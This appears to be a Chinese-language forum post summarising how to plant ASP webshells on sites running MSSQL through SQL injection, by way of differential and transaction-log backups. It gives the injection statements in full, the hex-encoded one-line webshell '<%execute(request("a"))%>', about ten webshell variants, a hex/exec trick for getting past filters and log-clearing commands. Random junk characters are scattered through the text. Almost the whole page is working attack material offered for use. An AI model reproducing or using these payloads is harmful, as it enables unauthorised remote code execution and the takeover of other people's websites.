MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
& C: `7 k* c: k6 q* E
* c! p' ~4 M3 I2 q4 s) l8 G6 O6 U2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
# ?+ i/ s9 M4 l7 w$ y) ?  l0 U. |8 P
3.进行差异备份
' p; z. a4 U8 E: r+ Z% f$ W( ~backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
" v) F4 C7 r( R& y, p8 |% C+ f% v
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

# O' E7 }. }0 Z如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

$ D" @* `+ x, `1 N- a& }7 Fdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
: _7 g1 j/ t) x, D0 t
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
( s8 v2 k' m2 E# d. D7 e
# d$ F# P0 Q6 V4 Q+ C1 }( f* H
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
7 C! y; v1 B4 e8 F4 ^
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。
1 e" ~3 P- G" |9 e* M% O6 W
0x77006F006B0061006F002E00620061006B00为wokao.bak
* O( h9 a, w6 S9 h5 o0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
0 S, B" n9 G% W6 C  o" O
声明：方法不是我想的，我只是写工具，默认得到shell是
' A: N1 [! k) V2 t2 a6 U% l<%execute(request("a"))%>
7 l9 M  v: m9 L/ S! E===============================================================

我发现上面代码，有时会无效，而直接用
1 g* O- R1 r" r  f: V9 d  {
4 X# _3 M5 A8 _* j5 f' S1 hbackup database 库名 to disk = 'c:\ddd.bak'

& O( c: T7 Z0 Ccreate table [dbo].[dtest] ([cmd] [image]);
7 k% L4 P% a  B3 t6 C' P6 E: U
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
' R  {5 z$ v) n; g8 S3 Z8 i
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
: Y% O- L" e& `
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
- E  X$ v( }* T
网上还有log增量备份的，我也把他记录一下
9 I! `+ I# y! p0 N/ O6 W+ D# r=====================================================
% Q* O9 O6 s8 G# X- q% l另一种log增量备份技术:

';alter database null set RECOVERY FULL--

) T+ I- e. o# s0 x, Z1 {';create table cmd (a image)--
& f* u2 W; y  F- C- ?. l
; d. d, ]! T2 n* {';backup log null to disk = 'f:\cmd' with init--
+ t! O9 Y" \4 l  w
- o! t. t$ c% w, [';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--

& T, ]8 S; V0 B" X$ w+ X! e0 j';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--

% J7 r. {8 ~: ^$ `3 |. kPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
; b- b3 |) g4 \" @) l0 R' v
说到一句话马，还可以有这么几种写法：

7 S" g' j/ E8 V9 ^a)<%%25Execute(request("a"))%%25>
  G5 O4 y4 X0 i) o3 rb)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
: j  e9 r: b* Ie)<%25Execute(request("a"))%25>
6 b; O  X2 M. e. p  R+ |f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
6 t3 _* B: W# b7 [8 L8 @0 f& dg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
/ j' P9 {  z, H+ Y7 eh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
1 ^( T- F& v7 u$ ?: gI)<%eval request(0)%>
2 R7 M6 t5 m4 CJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
5 n! ~9 }  B, o, s$ |
=============================================

& p- }2 K0 l& M6 u, h当遇到差备过滤了/时用这个语句代替
5 W4 p* C8 U8 {4 I9 N' D2 L* ]
declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
( ~4 R) l9 ^; W' p0 P
把要执行的语句转16进制然后用exec执行
: j' ?9 O7 o. n5 s6 }5 E9 ^
' H: K  q3 _( J+ ^" x% O; @6 H
减少备份文件大小方法如下:
+ n5 J+ f9 \: }3 P% G; O: P& l* @
总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
* D: r2 P; `, f2
id=1;backup database model to disk='你的路径‘ with differential,format;--
2 A1 K6 ]4 w6 D9 S
6 ]8 n$ L+ ]2 _  q1 F' }5 Z

# `1 o4 E$ f* J% R6 o( l: xSQL语句清理日志
7 \7 I7 J8 S2 i& A6 g$ H5 i注：test为数据库名

8 M7 |+ K3 V3 u--清空日志
, n) @- K& s; h7 B' v* CDUMP TRANSACTION test WITH NO_LOG
; P( {% z; _$ i6 t
--截断事务日志
. V. t* P3 I: ^3 IBACKUP LOG test WITH NO_LOG
: P$ K# a3 w3 C
--收缩数据库
DBCC SHRINKDATABASE(test)
5 ]8 p+ N) T$ O6 q2 _/ ]
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'